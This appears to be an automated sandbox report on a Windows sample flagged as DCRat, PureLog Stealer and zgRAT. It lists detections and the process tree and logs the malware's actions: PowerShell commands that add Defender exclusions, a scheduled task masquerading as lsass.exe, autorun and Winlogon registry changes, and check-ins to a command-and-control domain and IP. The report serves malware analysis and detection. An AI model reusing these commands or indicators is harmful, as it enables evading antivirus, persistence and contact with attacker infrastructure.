Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
JNKHlxGvw4.exe

Overview

General Information

Sample name:JNKHlxGvw4.exe
renamed because original name is a hash value
Original sample name:6689bd9a5c795eedc631e5fbb850b7ff.exe
Analysis ID:1572666
MD5:6689bd9a5c795eedc631e5fbb850b7ff
SHA1:b63d8e25d4eb9abea3ed0f7867f70db2ab18cba2
SHA256:cb4626ad921c63113e18c3aefb109f70c8e334089871133ea675d62d836d810b
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to detect virtual machines (SGDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • JNKHlxGvw4.exe (PID: 6588 cmdline: "C:\Users\user\Desktop\JNKHlxGvw4.exe" MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
    • csc.exe (PID: 908 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 6352 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5227.tmp" "c:\Windows\System32\CSC33CD08692B74926AEFF4FCBC6A080B2.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • schtasks.exe (PID: 908 cmdline: schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Users\user\Favorites\lsass.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • powershell.exe (PID: 1892 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7860 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7180 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7200 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7216 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Favorites\lsass.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7244 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\SystemSettings.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7252 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\JNKHlxGvw4.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7668 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8DlY2DY8qp.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7804 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7892 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • USZqVcJFLA.exe (PID: 1432 cmdline: "C:\Recovery\USZqVcJFLA.exe" MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
  • lsass.exe (PID: 7096 cmdline: C:\Users\user\Favorites\lsass.exe MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
  • lsass.exe (PID: 1364 cmdline: C:\Users\user\Favorites\lsass.exe MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
  • RuntimeBroker.exe (PID: 6412 cmdline: "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe" MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
  • RuntimeBroker.exe (PID: 2312 cmdline: "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe" MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
  • USZqVcJFLA.exe (PID: 5344 cmdline: C:\Recovery\USZqVcJFLA.exe MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
  • USZqVcJFLA.exe (PID: 5756 cmdline: C:\Recovery\USZqVcJFLA.exe MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
  • JNKHlxGvw4.exe (PID: 7980 cmdline: C:\Users\user\Desktop\JNKHlxGvw4.exe MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
  • JNKHlxGvw4.exe (PID: 7996 cmdline: C:\Users\user\Desktop\JNKHlxGvw4.exe MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
  • SystemSettings.exe (PID: 8016 cmdline: "C:\Program Files\Windows Multimedia Platform\SystemSettings.exe" MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
  • SystemSettings.exe (PID: 8032 cmdline: "C:\Program Files\Windows Multimedia Platform\SystemSettings.exe" MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
  • RuntimeBroker.exe (PID: 7808 cmdline: "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe" MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
  • USZqVcJFLA.exe (PID: 6596 cmdline: "C:\Recovery\USZqVcJFLA.exe" MD5: 6689BD9A5C795EEDC631E5FBB850B7FF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp", "MUTEX": "DCR_MUTEX-uarUuV05qHqkni1Ppe0P", "Params": {"0": "", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1865882915.000000001AD80000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    00000000.00000002.1865882915.000000001AD80000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000000.00000002.1861105197.0000000012615000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000000.00000002.1861105197.00000000128AD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          Process Memory Space: JNKHlxGvw4.exe PID: 6588JoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.JNKHlxGvw4.exe.1ad80000.6.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
              0.2.JNKHlxGvw4.exe.1ad80000.6.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.JNKHlxGvw4.exe.1ad80000.6.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                  0.2.JNKHlxGvw4.exe.1ad80000.6.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Files With System Process Name In Unsuspected Locations
                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\JNKHlxGvw4.exe, ProcessId: 6588, TargetFilename: C:\Users\user\Favorites\lsass.exe
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\JNKHlxGvw4.exe", ParentImage: C:\Users\user\Desktop\JNKHlxGvw4.exe, ParentProcessId: 6588, ParentProcessName: JNKHlxGvw4.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe', ProcessId: 1892, ProcessName: powershell.exe
                    Sigma detected: System File Execution Location Anomaly
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\user\Favorites\lsass.exe, CommandLine: C:\Users\user\Favorites\lsass.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\Favorites\lsass.exe, NewProcessName: C:\Users\user\Favorites\lsass.exe, OriginalFileName: C:\Users\user\Favorites\lsass.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\Favorites\lsass.exe, ProcessId: 7096, ProcessName: lsass.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\JNKHlxGvw4.exe, ProcessId: 6588, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker
                    Sigma detected: CurrentVersion NT Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\JNKHlxGvw4.exe, ProcessId: 6588, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\JNKHlxGvw4.exe", ParentImage: C:\Users\user\Desktop\JNKHlxGvw4.exe, ParentProcessId: 6588, ParentProcessName: JNKHlxGvw4.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline", ProcessId: 908, ProcessName: csc.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\JNKHlxGvw4.exe", ParentImage: C:\Users\user\Desktop\JNKHlxGvw4.exe, ParentProcessId: 6588, ParentProcessName: JNKHlxGvw4.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe', ProcessId: 1892, ProcessName: powershell.exe
                    Sigma detected: Dynamic CSharp Compile Artefact
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\JNKHlxGvw4.exe, ProcessId: 6588, TargetFilename: C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\JNKHlxGvw4.exe", ParentImage: C:\Users\user\Desktop\JNKHlxGvw4.exe, ParentProcessId: 6588, ParentProcessName: JNKHlxGvw4.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe', ProcessId: 1892, ProcessName: powershell.exe
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: C:\Users\user\Favorites\lsass.exe, CommandLine: C:\Users\user\Favorites\lsass.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\Favorites\lsass.exe, NewProcessName: C:\Users\user\Favorites\lsass.exe, OriginalFileName: C:\Users\user\Favorites\lsass.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\Favorites\lsass.exe, ProcessId: 7096, ProcessName: lsass.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Dot net compiler compiles file from suspicious location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\JNKHlxGvw4.exe", ParentImage: C:\Users\user\Desktop\JNKHlxGvw4.exe, ParentProcessId: 6588, ParentProcessName: JNKHlxGvw4.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline", ProcessId: 908, ProcessName: csc.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Schedule system process
                    Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Users\user\Favorites\lsass.exe'" /rl HIGHEST /f, CommandLine: schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Users\user\Favorites\lsass.exe'" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\JNKHlxGvw4.exe", ParentImage: C:\Users\user\Desktop\JNKHlxGvw4.exe, ParentProcessId: 6588, ParentProcessName: JNKHlxGvw4.exe, ProcessCommandLine: schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Users\user\Favorites\lsass.exe'" /rl HIGHEST /f, ProcessId: 908, ProcessName: schtasks.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-10T18:55:24.716612+010020480951A Network Trojan was detected192.168.2.449741104.21.16.180TCP
                    2024-12-10T18:56:30.482340+010020480951A Network Trojan was detected192.168.2.449762104.21.16.180TCP
                    2024-12-10T18:56:38.609309+010020480951A Network Trojan was detected192.168.2.449763104.21.16.180TCP
                    2024-12-10T18:56:46.794894+010020480951A Network Trojan was detected192.168.2.449764104.21.16.180TCP
                    2024-12-10T18:56:55.060545+010020480951A Network Trojan was detected192.168.2.449765104.21.16.180TCP
                    2024-12-10T18:57:10.451235+010020480951A Network Trojan was detected192.168.2.449766104.21.16.180TCP
                    2024-12-10T18:57:18.873049+010020480951A Network Trojan was detected192.168.2.449768104.21.16.180TCP
                    2024-12-10T18:57:34.810568+010020480951A Network Trojan was detected192.168.2.449770104.21.16.180TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: JNKHlxGvw4.exeAvira: detected
                    Antivirus detection for URL or domain
                    Source: http://188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.phpAvira URL Cloud: Label: malware
                    Source: http://188387cm.n9shteam.inAvira URL Cloud: Label: malware
                    Source: http://188387cm.n9shteam.in/Avira URL Cloud: Label: malware
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\8DlY2DY8qp.batAvira: detection malicious, Label: BAT/Delbat.C
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Recovery\USZqVcJFLA.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Users\user\Desktop\EDQjSEMY.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Users\user\Desktop\RzSYqgUu.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                    Source: C:\Users\user\Desktop\OljzCgRG.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                    Found malware configuration
                    Source: 00000000.00000002.1861105197.00000000128AD000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp", "MUTEX": "DCR_MUTEX-uarUuV05qHqkni1Ppe0P", "Params": {"0": "", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeReversingLabs: Detection: 78%
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeReversingLabs: Detection: 78%
                    Source: C:\Recovery\USZqVcJFLA.exeReversingLabs: Detection: 78%
                    Source: C:\Users\user\Desktop\EDQjSEMY.logReversingLabs: Detection: 50%
                    Source: C:\Users\user\Desktop\OljzCgRG.logReversingLabs: Detection: 70%
                    Source: C:\Users\user\Desktop\RzSYqgUu.logReversingLabs: Detection: 50%
                    Source: C:\Users\user\Desktop\bSdYXpxm.logReversingLabs: Detection: 25%
                    Source: C:\Users\user\Desktop\uhdUZoxx.logReversingLabs: Detection: 25%
                    Source: C:\Users\user\Desktop\vnccfbfp.logReversingLabs: Detection: 70%
                    Source: C:\Users\user\Favorites\lsass.exeReversingLabs: Detection: 78%
                    Multi AV Scanner detection for submitted file
                    Source: JNKHlxGvw4.exeReversingLabs: Detection: 78%
                    Machine Learning detection for dropped file
                    Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exeJoe Sandbox ML: detected
                    Source: C:\Recovery\USZqVcJFLA.exeJoe Sandbox ML: detected
                    Source: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\oBKeyAWK.logJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\OljzCgRG.logJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\AsBtWtog.logJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: JNKHlxGvw4.exeJoe Sandbox ML: detected
                    Source: JNKHlxGvw4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeDirectory created: C:\Program Files\Windows Multimedia Platform\SystemSettings.exeJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeDirectory created: C:\Program Files\Windows Multimedia Platform\9e60a5f7a3bd80Jump to behavior
                    Source: JNKHlxGvw4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.pdb source: JNKHlxGvw4.exe, 00000000.00000002.1832050899.0000000002A09000.00000004.00000800.00020000.00000000.sdmp

                    Spreading

                    barindex
                    Infects executable files (exe, dll, sys, html)
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\JNKHlxGvw4.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49741 -> 104.21.16.1:80
                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49768 -> 104.21.16.1:80
                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49764 -> 104.21.16.1:80
                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49765 -> 104.21.16.1:80
                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49770 -> 104.21.16.1:80
                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49766 -> 104.21.16.1:80
                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49762 -> 104.21.16.1:80
                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49763 -> 104.21.16.1:80
                    Uses ping.exe to check the status of other devices and networks
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: global trafficHTTP traffic detected: POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 188387cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 188387cm.n9shteam.inContent-Length: 332Expect: 100-continueConnection: Keep-Alive
